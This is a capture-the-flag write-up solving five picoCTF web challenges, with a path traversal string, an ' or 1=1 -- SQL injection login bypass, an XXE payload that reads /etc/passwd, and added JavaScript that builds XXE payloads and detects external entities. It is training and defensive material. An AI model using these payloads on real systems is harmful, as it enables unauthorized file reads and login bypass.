# Medium

| Problem         | Difficulty |
| --------------- | ---------- |
| Forbidden paths | Medium     |
| Login           | Medium     |
| Matchtheregex   | Medium     |
| More sqli       | Medium     |
| Soap            | Medium     |

{% stepper %}
{% step %}

### Forbidden Paths <a href="#forbidden-paths" id="forbidden-paths"></a>

> **Description**
>
> Can you get the flag? We know that the website files live in `/usr/share/nginx/html/` and the flag is at `/flag.txt` but the website is filtering absolute file paths. Can you get past the filter to read the flag? Here's the [website](http://saturn.picoctf.net:63193/).

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FIbqN9K2GK9ulpW0dlMGe%2Fimage.png?alt=media&#x26;token=0afe7129-4f4c-41ad-9018-10d16c2ad7e7" alt=""><figcaption></figcaption></figure>

The page reads whatever file name you give it. Since the description says only absolute paths are filtered, a relative path traversal should slip past the check, so I tried reading `../../../../../flag.txt` (the web root `/usr/share/nginx/html/` is four directories deep, so four `../` reach `/`; an extra one is harmless because `..` at the root stays at the root).

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FktZZuGgh2PEgod7zYgHG%2Fimage.png?alt=media&#x26;token=9746cc9e-341f-4dfc-8cc2-f323e217f9d5" alt=""><figcaption></figcaption></figure>

easy solve :smile:
{% endstep %}

{% step %}

### Login

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FC0D1M1hAZgrj7MKQpHCy%2Fimage.png?alt=media&#x26;token=60d9f40d-a93c-4b4d-beb6-e84d2d9491ee" alt=""><figcaption></figcaption></figure>

When enumerating the page source I found something interesting: the whole login check runs in the browser.

{% code overflow="wrap" %}

```javascript
(async () => {
  await new Promise((e) => window.addEventListener("load", e));
  document.querySelector("form").addEventListener("submit", (e) => {
    e.preventDefault();
    // Base64-encode both fields and strip the '=' padding before comparing
    const r = { u: "input[name=username]", p: "input[name=password]" };
    const t = {};
    for (const e in r)
      t[e] = btoa(document.querySelector(r[e]).value).replace(/=/g, "");
    // Both expected values are hard-coded in the page: the check never reaches the server
    return "YWRtaW4" !== t.u
      ? alert("Incorrect Username")
      : "cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ" !== t.p
      ? alert("Incorrect Password")
      : void alert(`Correct Password! Your flag is ${atob(t.p)}.`);
  });
})();
```

{% endcode %}

You can see that it checks whether the username is `YWRtaW4`, which is base64 for `admin` with the trailing `=` padding stripped (that is what the `.replace(/=/g, "")` does). The password is compared the same way, and the success branch simply decodes the password constant with `atob` to produce the flag, so everything needed is recoverable from the page source alone.

<div data-full-width="true"><figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2F7KJtDKu9ShbW7eCF51b2%2Fimage.png?alt=media&#x26;token=17d0c780-89b6-4d6d-8d83-db047b5450a4" alt="" width="514"><figcaption></figcaption></figure></div>

With the username and password decoded we can log in and get the flag :thumbsup:
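The following is an added example, not code from the challenge or this writeup: it pulls base64-looking string literals out of inline JavaScript, restores the `=` padding the checker stripped, and decodes them. `SNIPPET` is a copy of the checker script shown above; the length threshold and the printable-ASCII filter are my own heuristics for separating real base64 from identifiers that merely happen to use base64 characters.

```javascript
// Added example: recover base64 constants from a client-side login check.
// SNIPPET is a copy of the checker script from the page.
const SNIPPET = `(async()=>{await new Promise((e=>window.addEventListener("load",e))),document.querySelector("form").addEventListener("submit",(e=>{e.preventDefault();
const r={u:"input[name=username]",p:"input[name=password]"},t={};
for(const e in r)
t[e]=btoa(document.querySelector(r[e]).value).replace(/=/g,"");
return"YWRtaW4"!==t.u?alert("Incorrect Username"):
"cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ"!==t.p?alert("Incorrect Password"):
void alert(\`Correct Password! Your flag is \${atob(t.p)}.\`)}))})();`;

// Unpadded base64 has length 2 or 3 mod 4 (never 1); add '=' until it is a multiple of 4.
function restorePadding(b64) {
  return b64 + "=".repeat((4 - (b64.length % 4)) % 4);
}

function decodeUnpadded(b64) {
  return Buffer.from(restorePadding(b64), "base64").toString("utf8");
}

// Quoted runs of base64-alphabet characters, at least minLen long (heuristic threshold).
function extractBase64Literals(js, minLen = 6) {
  const re = new RegExp(`["']([A-Za-z0-9+/]{${minLen},})["']`, "g");
  const out = [];
  let m;
  while ((m = re.exec(js)) !== null) out.push(m[1]);
  return out;
}

// Keep only candidates that decode to printable ASCII: ordinary identifiers such as
// "submit" are valid base64 characters too but decode to junk bytes, so they are dropped.
function decodeLiterals(js) {
  return extractBase64Literals(js)
    .filter((b64) => b64.length % 4 !== 1)
    .map((b64) => ({ b64, text: decodeUnpadded(b64) }))
    .filter(({ text }) => /^[\x20-\x7e]+$/.test(text));
}

for (const { b64, text } of decodeLiterals(SNIPPET)) {
  console.log(`${b64} -> ${text}`);
}
```

Run it with Node; the two surviving literals are the expected username and the password, and the decoded password is the flag the page's success branch would have alerted.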
{% endstep %}

{% step %}

### Match the regex

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FHfVhRmdnZLJZ8r4wIrDl%2Fimage.png?alt=media&#x26;token=0e9dd4dc-6524-460c-9240-2c57a57ef25e" alt=""><figcaption></figcaption></figure>

After enumerating the page source code

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FF0Srripj9BteXmTAKUaQ%2Fimage.png?alt=media&#x26;token=032383a9-6d03-401f-8ad7-e3f19406960c" alt=""><figcaption></figcaption></figure>

we found a function with a suspicious comment: it contains a regular expression. In a regex `.` matches any single character, so I'm pretty sure any input that starts with `p`, has one arbitrary character for each `.`, and then ends with `F` will pass the check.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2Fm3tsNXdpiEhMatfrQqfb%2Fimage.png?alt=media&#x26;token=e668d2b7-cf64-4539-990a-ff62ad33431c" alt=""><figcaption></figcaption></figure>

easily solved :smile:
{% endstep %}

{% step %}

### More sqli

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FDfZDl7BxGRNfgFJiuOGc%2Fimage.png?alt=media&#x26;token=4fe768b0-0aac-419f-810b-1b9f2c8ea83a" alt=""><figcaption></figcaption></figure>

When I try to log in with random creds

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FOUOuiuBJNHavm7UOHG6e%2Fimage.png?alt=media&#x26;token=90981b5f-4431-48cd-82b3-224d2e4fdf8d" alt=""><figcaption></figcaption></figure>

the website actually shows the SQL query it executed, so this challenge becomes very easy: we can see exactly where our input ends up in the statement.

We can just use

```
' or 1=1 --
```

to bypass the login: the single quote closes the string literal our input was placed in, `or 1=1` makes the `WHERE` clause true for every row, and `--` comments out whatever the original query had after our input. Keep a space after `--`; some databases (MySQL among them) only treat it as a comment when it is followed by whitespace.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FiIGXFFwQsr1ZGoNqa3zT%2Fimage.png?alt=media&#x26;token=5f94a421-b894-4e3f-88aa-e83db4ecfc45" alt="" width="388"><figcaption></figcaption></figure>

the challenge is not over yet!

We land on another page. Now, where could that flag be :thinking:

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2Ff2jBYQf1jC5HPIU01rZU%2Fimage.png?alt=media&#x26;token=0cae2420-c5b4-4f0f-a9e7-b71c5f0cbf7c" alt=""><figcaption></figcaption></figure>

Anything familiar?

Yup, we solved the challenge very easily :sunglasses:
{% endstep %}

{% step %}

### Soap

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FufuHCHNo6orHzhyMsqyq%2Fimage.png?alt=media&#x26;token=e1dfdc45-7094-416b-81bb-22b66e7e61cd" alt="" width="507"><figcaption></figcaption></figure>

While casually playing around with the website I found something interesting

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2Fmkw3qNAqLKA7o2Rgwe2O%2Fimage.png?alt=media&#x26;token=112dde81-494a-4c09-8bc8-d7e936b6b0af" alt=""><figcaption></figcaption></figure>

The website sends XML to the server. After reading up on XML I suspected the endpoint might be vulnerable to XXE (XML External Entity) injection: if the server-side parser resolves external entities, a `DOCTYPE` that declares an entity pointing at a local file makes the parser substitute that file's contents wherever the entity is referenced, and the response echoes it back. Reading `/etc/passwd` is the usual first test.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <ID>&xxe;</ID>
</data>
```

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FdrRDiKspHfVWECOPn4BV%2Fimage.png?alt=media&#x26;token=734aac75-9e60-451b-ad70-4d995d495651" alt=""><figcaption></figcaption></figure>

Solved the challenge easily again :laughing:
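To round this off, here is an added example (not code from the challenge or this writeup) with both sides of the technique: a builder that produces the payload above for any file path, and a detector of the kind a server could run before parsing to flag documents that declare an external entity, covering general entities, parameter entities and external DTD subsets. The element name and the sample documents are constructed for the demonstration.

```javascript
// Added example: XXE payload construction and a pre-parse check for external entities.

// Build the same payload shape as above for an arbitrary file path.
// 'element' is the tag whose value the server echoes back (assumed to be ID here).
function buildXxePayload(filePath, element = "ID") {
  return [
    '<?xml version="1.0" encoding="UTF-8"?>',
    "<!DOCTYPE data [",
    `  <!ENTITY xxe SYSTEM "file://${filePath}">`,
    "]>",
    "<data>",
    `  <${element}>&xxe;</${element}>`,
    "</data>",
  ].join("\n");
}

// True when the document pulls in anything external:
//  - an internal subset declaring a SYSTEM/PUBLIC entity (general or parameter, "%"),
//  - or a DOCTYPE that references an external DTD directly.
function declaresExternalEntity(xml) {
  const internalSubset =
    /<!DOCTYPE[^>]*\[[\s\S]*?<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC)\b[\s\S]*?\]>/i;
  const externalDtd = /<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\b/i;
  return internalSubset.test(xml) || externalDtd.test(xml);
}

// Constructed sample documents for the demonstration.
const SAMPLES = {
  xxe: buildXxePayload("/etc/passwd"),
  plain: '<?xml version="1.0"?><data><ID>1</ID></data>',
  internalOnly: '<!DOCTYPE d [<!ENTITY greet "hi">]><d>&greet;</d>',
  parameterEntity:
    '<!DOCTYPE d [<!ENTITY % p SYSTEM "http://example.invalid/evil.dtd"> %p;]><d/>',
  externalDtd: '<!DOCTYPE data SYSTEM "http://example.invalid/evil.dtd"><data/>',
};

for (const [name, xml] of Object.entries(SAMPLES)) {
  console.log(`${name}: external entity declared = ${declaresExternalEntity(xml)}`);
}
```

The regex check is only a pre-filter for logging or rejecting obvious payloads; the real fix is to disable DTD processing and external entity resolution in the XML parser itself, since a pattern match cannot account for every encoding or parser quirk.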
{% endstep %}
{% endstepper %}
